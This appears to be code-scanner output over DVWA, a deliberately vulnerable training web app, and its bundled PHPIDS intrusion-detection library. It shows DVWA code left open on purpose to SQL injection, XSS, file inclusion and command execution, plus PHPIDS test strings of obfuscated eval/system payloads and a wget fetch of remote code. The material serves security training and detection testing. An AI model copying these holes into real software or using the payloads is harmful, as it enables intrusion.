./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:23 (5/6) OK | Dubious | Bad | Hide 
20-        if (!$file) {
21-            $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser';
22-        }
23:        $this->table = unserialize(file_get_contents($file));
24-    }
25-    
26-    /**
./external/phpids/0.6/lib/IDS/Converter.php:632 (6/6) OK | Dubious | Bad | Hide 
629-        $threshold = 3.49;
630-        $unserialized = false;
631-        if(preg_match('/^\w:\d+:\{/', $value)) {
632:            $unserialized = @unserialize($value);
633-        }
634-
635-        if (strlen($value) > 25 && !$unserialized) {

` (17) Top | Hide

./login.php:23 (1/17) OK | Dubious | Bad | Hide 
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./vulnerabilities/csrf/source/low.php:14 (2/17) OK | Dubious | Bad | Hide 
11-			$pass_new = mysql_real_escape_string($pass_new);
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:16 (3/17) OK | Dubious | Bad | Hide 
13-		$pass_curr = md5( $pass_curr );
14-		
15-		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/medium.php:16 (4/17) OK | Dubious | Bad | Hide 
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./vulnerabilities/brute/source/low.php:10 (5/17) OK | Dubious | Bad | Hide 
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:16 (6/17) OK | Dubious | Bad | Hide 
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/medium.php:14 (7/17) OK | Dubious | Bad | Hide 
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./external/phpids/0.6/tests/IDS/MonitorTest.php:1026 (8/17) OK | Dubious | Bad | Hide 
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //
1025-                        $_c="". $_SERVER[$_b]; //
1026:                        $_a( `$_c` );//';
1027-        $exploits[] = '"; //
1028-                        $_c = "" . $_a($b);
1029:                        $_b(`$_c`);//';
1030-        $exploits[] = '" ; //
1031-                        if  (!0) $_a = base64_decode ;
1032-                        if  (!0) $_b = parse_str ; //
./external/phpids/0.6/tests/IDS/MonitorTest.php:1038 (9/17) OK | Dubious | Bad | Hide 
1035-                        $_e= "" . $_SERVER[$_d];
1036-                        $_b($_e); //
1037-                        $_f = "" . $_a($b);
1038:                        $_c(`$_f`);//';
1039-        $exploits[] = '" ; //
1040-                        $_y = "" . strrev("ftnirp");
1041-                        if  (!0)    $_a = base64_decode ;
1042-                        if  (!0)    $_b="" . $_a(\'cHdk\');
1043:                        if (!0) $_y(`$_b`);//';
1044-        $exploits[] = '";{ if (true) $_a  = "" . str_replace(\'!\',\'\',\'s!y!s!t!e!m!\');
1045-                        $_a( "dir"); } //';
1046-        $exploits[] = '";{ if (true) $_a  = "" . strtolower("pass");
./external/phpids/0.6/tests/IDS/MonitorTest.php:1056 (10/17) OK | Dubious | Bad | Hide 
1053-        $exploits[] = '";; //
1054-                        if (!($_b[]  %1)) $_a[0]  = system;
1055-                        $_a[0](!a. "ls");  //';
1056:        $exploits[] = '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//';
1057:        $exploits[] = 'aaaa { $ {`wget hxxp://example.com/x.php`}}';
1058-
1059-        $this->_testForPlainEvent($exploits);
1060-
./external/phpids/0.6/lib/IDS/Caching/Database.php:42 (11/17) OK | Dubious | Bad | Hide 
39-
40-    #create the database
41-
42:    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
44:    DROP TABLE IF EXISTS `cache`;
45-
46-    #now select the created datbase and create the table
47-
48:    CREATE TABLE `cache` (
49:        `type` VARCHAR( 32 ) NOT null ,
50:        `data` TEXT NOT null ,
51:        `created` DATETIME NOT null ,
52:        `modified` DATETIME NOT null
53-    ) ENGINE = MYISAM ;
54- */
55-
./external/phpids/0.6/lib/IDS/Caching/Database.php:151 (12/17) OK | Dubious | Bad | Hide 
148-
149-        $handle = $this->handle;
150-        
151:        $rows = $handle->query('SELECT created FROM `' . 
152:            $handle->quote($this->config['table']).'`');
153-            
154-        if (!$rows || $rows->rowCount() === 0) {
155-
./external/phpids/0.6/lib/IDS/Caching/Database.php:251 (13/17) OK | Dubious | Bad | Hide 
248-            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251:                INSERT INTO `' . 
252:                $this->config['table'].'` (
253-                    type,
254-                    data,
255-                    created,
./external/phpids/0.6/lib/IDS/Converter.php:261 (14/17) OK | Dubious | Bad | Hide 
258-    public static function convertQuotes($value)
259-    {
260-        // normalize different quotes to "
261:        $pattern = array('\'', '`', '´', '’', '‘');
262-        $value   = str_replace($pattern, '"', $value);
263-
264-        return $value;
./external/phpids/0.6/lib/IDS/Converter.php:496 (15/17) OK | Dubious | Bad | Hide 
493-                    '+ACU-'      => '%',
494-                    '+ACQ-'      => '$',
495-                    '+AD0-'      => '=',
496:                    '+AGA-'      => '`',
497-                    '+ALQ-'      => '"',
498-                    '+IBg-'      => '"',
499-                    '+IBk-'      => '"',
./external/phpids/0.6/lib/IDS/Log/Database.php:39 (16/17) OK | Dubious | Bad | Hide 
36-/*
37- * Needed SQL:
38- *
39:    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
40-        SET utf8 COLLATE utf8_general_ci;
41:    DROP TABLE IF EXISTS `intrusions`;
42:    CREATE TABLE IF NOT EXISTS `intrusions` (
43:      `id` int(11) unsigned NOT null auto_increment,
44:      `name` varchar(128) NOT null,
45:      `value` text NOT null,
46:      `page` varchar(255) NOT null,
47:      `ip` varchar(15) NOT null,
48:      `impact` int(11) unsigned NOT null,
49:      `origin` varchar(15) NOT null,
50:      `created` datetime NOT null,
51:      PRIMARY KEY  (`id`)
52-    ) ENGINE=MyISAM ;
53- *
54- *
./dvwa/includes/DBMS/DBMS.php:21 (17/17) OK | Dubious | Bad | Hide 
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-

base64_decode( (1) Top | Hide

./external/phpids/0.6/lib/IDS/Converter.php:384 (1/1) OK | Dubious | Bad | Hide 
382-        foreach ($matches[1] as $item) {
383-            if (isset($item) && !preg_match('/[a-f0-9]{32}/i', $item)) {
384:                $value = str_replace($item, base64_decode($item), $value);
385-            }
386-        }
387-

\$\$ (4) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:250 (1/4) OK | Dubious | Bad | Hide 
248-                            {};;
249-                            {v =(0)?z:z}v={_$:z+'aler'+z};
250:                            {k =(0)?z:z}k={_$$:v._$+'t(x)'+z};
251-                            x=''+y.y+'l';{};
252-
253-                            n=.1[x];
254:                            n(k._$$)";
255-        $exploits[] = "ä=/ä/!=/ä/?'': 0;b=(ä+'eva'+ä);b=(b+'l'+ä);d=(ä+'XSS'+ä);c=(ä+'aler'+ä);c=(c+'t(d)'+ä);$=.0[b];a=$;a(c)";
256-        $exploits[] = 'x=/x/
257-                            $x=!!1?\'ash\':xx
./external/phpids/0.6/tests/IDS/MonitorTest.php:375 (2/4) OK | Dubious | Bad | Hide 
372-                        $a=$a=$b';
373-        $exploits[] = "123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);";
374-        $exploits[] = '$_ = !1-1 ? 0["\ev\al""]("\a\l\ert\(1\)"") : 0';
375:        $exploits[] = "$$$[0] = !1-1 ? 'eva' : 0
376-
377:                        $$$[1] = !1-1 ? 'l' : 0
378-
379:                        $$$['\jo\in']([])";
380-        $exploits[] = 'x=/eva/i[-1]
381-                        $y=/nam/i[-1]
382-                        $x$_0=(0)[x+\'l\']
./external/phpids/0.6/tests/IDS/MonitorTest.php:565 (3/4) OK | Dubious | Bad | Hide 
562-        $exploits[] = 'eval.call(this,unescape.call(this,location))';
563-        $exploits[] = 'd=0||\'une\'+\'scape\'||0;a=0||\'ev\'+\'al\'||0;b=0||\'locatio\';b+=0||\'n\'||0;c=b[a];d=c(d);c(d(c(b)))';
564-        $exploits[] = '_=eval,__=unescape,___=document.URL,_(__(___))';
565:        $exploits[] = '$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))';
566-        $exploits[] = '$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)';
567-        $exploits[] = 'ev\al.call(this,unescape.call(this,location))';
568-        $exploits[] = 'setTimeout//
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Table.php:66 (4/4) OK | Dubious | Bad | Hide 
63-                        case 'tfoot':
64-                            // access the appropriate variable, $thead or $tfoot
65-                            $var = $collection[$tag_index]->name;
66:                            if ($$var === false) {
67:                                $$var = $collection;
68-                            } else {
69-                                // transmutate the first and less entries into
70-                                // tbody tags, and then put into content

$_GET (29) Top | Hide

./instructions.php:19 (1/29) OK | Dubious | Bad | Hide 
17-);
18-
19:$selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : '';
20-if( !array_key_exists( $selectedDocId, $docs ) ) {
21-	$selectedDocId = 'readme';
22-}
./security.php:31 (2/29) OK | Dubious | Bad | Hide 
28-}
29-
30-
31:if( isset( $_GET['phpids'] ) ) {
32:	switch( $_GET[ 'phpids' ] ) {
33-		case 'on':
34-			dvwaPhpIdsEnabledSet( true );
35-			dvwaMessagePush( "PHPIDS is now enabled" );
./vulnerabilities/csrf/source/low.php:3 (3/29) OK | Dubious | Bad | Hide 
1-<?php
2-				
3:	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_new = $_GET['password_new'];
7:		$pass_conf = $_GET['password_conf'];
8-
9-
10-		if (($pass_new == $pass_conf)){
./vulnerabilities/csrf/source/high.php:3 (4/29) OK | Dubious | Bad | Hide 
1-<?php
2-			
3:	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_curr = $_GET['password_current'];
7:		$pass_new = $_GET['password_new'];
8:		$pass_conf = $_GET['password_conf'];
9-
10-		// Sanitise current password input
11-		$pass_curr = stripslashes( $pass_curr );
./vulnerabilities/csrf/source/medium.php:3 (5/29) OK | Dubious | Bad | Hide 
1-<?php
2-			
3:	if (isset($_GET['Change'])) {
4-	
5-		// Checks the http referer header
6-		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9:			$pass_new = $_GET['password_new'];
10:			$pass_conf = $_GET['password_conf'];
11-
12-			if ($pass_new == $pass_conf){
13-				$pass_new = mysql_real_escape_string($pass_new);
./vulnerabilities/fi/source/low.php:3 (6/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:	$file = $_GET['page']; //The page we wish to display 
4-
5-?>
./vulnerabilities/fi/source/high.php:3 (7/29) OK | Dubious | Bad | Hide 
1-<?php
2-		
3:	$file = $_GET['page']; //The page we wish to display 
4-
5-	// Only allow include.php
6-	if ( $file != "include.php" ) {
./vulnerabilities/fi/source/medium.php:3 (8/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:	$file = $_GET['page']; // The page we wish to display 
4-
5-	// Bad input validation
6-	$file = str_replace("http://", "", $file);
./vulnerabilities/sqli_blind/source/low.php:3 (9/29) OK | Dubious | Bad | Hide 
1-<?php	
2-
3:if (isset($_GET['Submit'])) {
4-	
5-	// Retrieve data
6-	
7:	$id = $_GET['id'];
8-
9-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
./vulnerabilities/sqli_blind/source/high.php:3 (10/29) OK | Dubious | Bad | Hide 
1-<?php	
2-
3:if(isset($_GET['Submit'])){
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = stripslashes($id);
9-	$id = mysql_real_escape_string($id);
10-
./vulnerabilities/sqli_blind/source/medium.php:3 (11/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
./vulnerabilities/view_source.php:11 (12/29) OK | Dubious | Bad | Hide 
8-$page = dvwaPageNewGrab();
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Source';
10-
11:$id = $_GET[ 'id' ];
12:$security = $_GET[ 'security' ];
13-
14-
15-if ($id == 'fi'){
./vulnerabilities/brute/source/low.php:3 (13/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_GET['Login'] ) ) {
4-
5:	$user = $_GET['username'];
6-	
7:	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10-	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
./vulnerabilities/brute/source/high.php:3 (14/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_GET[ 'Login' ] ) ) {
4-
5-	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
10-	// Sanitise password input
11:	$pass = $_GET[ 'password' ];
12-	$pass = stripslashes( $pass );
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
./vulnerabilities/brute/source/medium.php:3 (15/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_GET[ 'Login' ] ) ) {
4-
5-	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9-	// Sanitise password input
10:	$pass = $_GET[ 'password' ];
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
./vulnerabilities/view_help.php:11 (16/29) OK | Dubious | Bad | Hide 
8-$page = dvwaPageNewGrab();
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Help';
10-
11:$id = $_GET[ 'id' ];
12:$security = $_GET[ 'security' ];
13-
14-$help = file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/help/help.php" );
15-
./vulnerabilities/sqli/source/low.php:3 (17/29) OK | Dubious | Bad | Hide 
1-<?php	
2-
3:if(isset($_GET['Submit'])){
4-	
5-	// Retrieve data
6-	
7:	$id = $_GET['id'];
8-
9-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
./vulnerabilities/sqli/source/high.php:3 (18/29) OK | Dubious | Bad | Hide 
1-<?php	
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = stripslashes($id);
9-	$id = mysql_real_escape_string($id);
10-
./vulnerabilities/sqli/source/medium.php:3 (19/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
./vulnerabilities/view_source_all.php:10 (20/29) OK | Dubious | Bad | Hide 
7-$page = dvwaPageNewGrab();
8-$page[ 'title' ] .= $page[ 'title_separator' ].'Source';
9-
10:$id = $_GET[ 'id' ];
11-
12-$lowsrc = @file_get_contents("./{$id}/source/low.php");
13-$lowsrc = str_replace( array( '$html .=' ), array( 'echo' ), $lowsrc);
./vulnerabilities/xss_r/source/low.php:3 (21/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-
5- $isempty = true;
6-
7-} else {
8-		
9- $html .= '<pre>';
10: $html .= 'Hello ' . $_GET['name'];
11- $html .= '</pre>';
12-	
13-}
./vulnerabilities/xss_r/source/high.php:3 (22/29) OK | Dubious | Bad | Hide 
1-<?php
2-	
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-	
5- $isempty = true;
6-		
7-} else {
8-	
9- $html .= '<pre>';
10: $html .= 'Hello ' . htmlspecialchars($_GET['name']);
11- $html .= '</pre>';
12-		
13-}
./vulnerabilities/xss_r/source/medium.php:3 (23/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-
5- $isempty = true;
6-
7-} else {
8-
9- $html .= '<pre>';
10: $html .= 'Hello ' . str_replace('<script>', '', $_GET['name']);
11- $html .= '</pre>'; 
12-
13-}
./external/phpids/0.6/docs/examples/example.php:43 (24/29) OK | Dubious | Bad | Hide 
40-    */
41-    $request = array(
42-        'REQUEST' => $_REQUEST,
43:        'GET' => $_GET,
44-        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
46-    );
./external/phpids/0.6/tests/IDS/MonitorTest.php:1056 (25/29) OK | Dubious | Bad | Hide 
1053-        $exploits[] = '";; //
1054-                        if (!($_b[]  %1)) $_a[0]  = system;
1055-                        $_a[0](!a. "ls");  //';
1056:        $exploits[] = '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//';
1057-        $exploits[] = 'aaaa { $ {`wget hxxp://example.com/x.php`}}';
1058-
1059-        $this->_testForPlainEvent($exploits);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:406 (26/29) OK | Dubious | Bad | Hide 
403-    }
404-    
405-    /**
406:     * Loads configuration values from $_GET/$_POST that were posted
407-     * via ConfigForm
408:     * @param $array $_GET or $_POST array to import
409-     * @param $index Index/name that the config variables are in
410-     * @param $allowed List of allowed namespaces/directives 
411-     * @param $mq_fix Boolean whether or not to enable magic quotes fix
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:421 (27/29) OK | Dubious | Bad | Hide 
418-    }
419-    
420-    /**
421:     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422-     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
./dvwa/includes/dvwaPhpIds.inc.php:45 (28/29) OK | Dubious | Bad | Hide 
42-
43-// Clear PHPIDS log
44-function dvwaClearIdsLog()	{
45:	if (isset($_GET['clear_log'])) { 
46-		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47-		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
./dvwa/includes/dvwaPhpIds.inc.php:58 (29/29) OK | Dubious | Bad | Hide 
55-	try {
56-		$request = array(
57-			'REQUEST' => $_REQUEST,
58:			'GET' => $_GET,
59-			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE
61-		);

$_POST (16) Top | Hide

./login.php:11 (1/16) OK | Dubious | Bad | Hide 
9-dvwaDatabaseConnect();
10-
11:if( isset( $_POST[ 'Login' ] ) ) {
12-
13-
14:	$user = $_POST[ 'username' ];
15-	$user = stripslashes( $user );
16-	$user = mysql_real_escape_string( $user );
17-
18:	$pass = $_POST[ 'password' ];
19-	$pass = stripslashes( $pass );
20-	$pass = mysql_real_escape_string( $pass );
21-	$pass = md5( $pass );
./security.php:13 (2/16) OK | Dubious | Bad | Hide 
10-$page[ 'page_id' ] = 'security';
11-
12-$securityHtml = '';
13:if( isset( $_POST['seclev_submit'] ) ) {
14-	$securityLevel = 'high';
15-
16:	switch( $_POST[ 'security' ] ) {
17-		case 'low':
18-			$securityLevel = 'low';
19-			break;
./vulnerabilities/exec/source/low.php:3 (3/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_POST[ 'submit' ] ) ) {
4-
5-	$target = $_REQUEST[ 'ip' ];
6-
./vulnerabilities/exec/source/high.php:3 (4/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_POST[ 'submit' ] ) ) {
4-
5-	$target = $_REQUEST["ip"];
6-
./vulnerabilities/exec/source/medium.php:3 (5/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if( isset( $_POST[ 'submit'] ) ) {
4-
5-	$target = $_REQUEST[ 'ip' ];
6-
./vulnerabilities/upload/source/low.php:2 (6/16) OK | Dubious | Bad | Hide 
1-<?php
2:	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
./vulnerabilities/upload/source/high.php:2 (7/16) OK | Dubious | Bad | Hide 
1-<?php
2:if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename($_FILES['uploaded']['name']);
./vulnerabilities/upload/source/medium.php:2 (8/16) OK | Dubious | Bad | Hide 
1-<?php
2:	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename($_FILES['uploaded']['name']);
./vulnerabilities/xss_s/source/low.php:3 (9/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = stripslashes($message);
./vulnerabilities/xss_s/source/high.php:3 (10/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = stripslashes($message);
./vulnerabilities/xss_s/source/medium.php:3 (11/16) OK | Dubious | Bad | Hide 
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = trim(strip_tags(addslashes($message)));
./external/phpids/0.6/docs/examples/example.php:44 (12/16) OK | Dubious | Bad | Hide 
41-    $request = array(
42-        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44:        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
46-    );
47-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:406 (13/16) OK | Dubious | Bad | Hide 
403-    }
404-    
405-    /**
406:     * Loads configuration values from $_GET/$_POST that were posted
407-     * via ConfigForm
408:     * @param $array $_GET or $_POST array to import
409-     * @param $index Index/name that the config variables are in
410-     * @param $allowed List of allowed namespaces/directives 
411-     * @param $mq_fix Boolean whether or not to enable magic quotes fix
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:421 (14/16) OK | Dubious | Bad | Hide 
418-    }
419-    
420-    /**
421:     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422-     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
./setup.php:12 (15/16) OK | Dubious | Bad | Hide 
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Setup';
10-$page[ 'page_id' ] = 'setup';
11-
12:if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15-		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
./dvwa/includes/dvwaPhpIds.inc.php:59 (16/16) OK | Dubious | Bad | Hide 
56-		$request = array(
57-			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59:			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE
61-		);
62-

$_REQUEST (6) Top | Hide

./vulnerabilities/exec/source/low.php:5 (1/6) OK | Dubious | Bad | Hide 
3-if( isset( $_POST[ 'submit' ] ) ) {
4-
5:	$target = $_REQUEST[ 'ip' ];
6-
7-	// Determine OS and execute the ping command.
8-	if (stristr(php_uname('s'), 'Windows NT')) {
./vulnerabilities/exec/source/high.php:5 (2/6) OK | Dubious | Bad | Hide 
2-
3-if( isset( $_POST[ 'submit' ] ) ) {
4-
5:	$target = $_REQUEST["ip"];
6-	
7-	$target = stripslashes( $target );
8-
./vulnerabilities/exec/source/medium.php:5 (3/6) OK | Dubious | Bad | Hide 
2-
3-if( isset( $_POST[ 'submit'] ) ) {
4-
5:	$target = $_REQUEST[ 'ip' ];
6-
7-	// Remove any of the charactars in the array (blacklist).
8-	$substitutions = array(
./external/phpids/0.6/docs/examples/example.php:42 (4/6) OK | Dubious | Bad | Hide 
39-    * with your variables_order settings
40-    */
41-    $request = array(
42:        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44-        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
./external/phpids/0.6/docs/examples/cakephp/ids.php:118 (5/6) OK | Dubious | Bad | Hide 
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
118:        $_REQUEST['IDS_request_uri'] = $_SERVER['REQUEST_URI'];
119-        if (isset($_SERVER['HTTP_USER_AGENT'])) {
120:            $_REQUEST['IDS_user_agent'] = $_SERVER['HTTP_USER_AGENT'];
121-        }
122-
123-        #init the PHPIDS and pass the REQUEST array
124-        $this->init = IDS_Init::init();
125:        $ids        = new IDS_Monitor($this->init, $_REQUEST);
126-        $result     = $ids->run();
127-
128-        // Re-set include path
./dvwa/includes/dvwaPhpIds.inc.php:57 (6/6) OK | Dubious | Bad | Hide 
54-function dvwaPhpIdsTrap() {
55-	try {
56-		$request = array(
57:			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59-			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE

$_SESSION (4) Top | Hide

./external/phpids/0.6/tests/IDS/CachingTest.php:88 (1/4) OK | Dubious | Bad | Hide 
86-        $cache = IDS_Caching::factory($this->init, 'storage');
87-        $cache = $cache->setCache(array(1,2,3,4));
88:        $_SESSION['PHPIDS']['storage'] = null;
89-        $this->assertFalse($cache->getCache());
90-    }
91-
./external/phpids/0.6/lib/IDS/Caching/Session.php:118 (2/4) OK | Dubious | Bad | Hide 
115-    public function setCache(array $data) 
116-    {
117-
118:        $_SESSION['PHPIDS'][$this->type] = $data;
119-        return $this;
120-    }
121-
./external/phpids/0.6/lib/IDS/Caching/Session.php:132 (3/4) OK | Dubious | Bad | Hide 
129-    public function getCache() 
130-    {
131-
132:        if ($this->type && $_SESSION['PHPIDS'][$this->type]) {
133:            return $_SESSION['PHPIDS'][$this->type];
134-        }
135-
136-        return false;
./dvwa/includes/dvwaPage.inc.php:53 (4/4) OK | Dubious | Bad | Hide 
50-
51-function &dvwaSessionGrab() {
52-
53:	if( !isset( $_SESSION[ 'dvwa' ] ) ) {
54-
55:		$_SESSION[ 'dvwa' ] = array();
56-
57-	}
58-
59:	return $_SESSION[ 'dvwa' ];
60-}
61-
62-

$_SERVER (18) Top | Hide

./vulnerabilities/csrf/source/medium.php:6 (1/18) OK | Dubious | Bad | Hide 
4-	
5-		// Checks the http referer header
6:		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9-			$pass_new = $_GET['password_new'];
./external/phpids/0.6/docs/examples/cakephp/ids.php:118 (2/18) OK | Dubious | Bad | Hide 
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
118:        $_REQUEST['IDS_request_uri'] = $_SERVER['REQUEST_URI'];
119:        if (isset($_SERVER['HTTP_USER_AGENT'])) {
120:            $_REQUEST['IDS_user_agent'] = $_SERVER['HTTP_USER_AGENT'];
121-        }
122-
123-        #init the PHPIDS and pass the REQUEST array
./external/phpids/0.6/docs/examples/cakephp/ids.php:194 (3/18) OK | Dubious | Bad | Hide 
191-                $this->controller->Session->read('User.id') :
192-                0;
193-
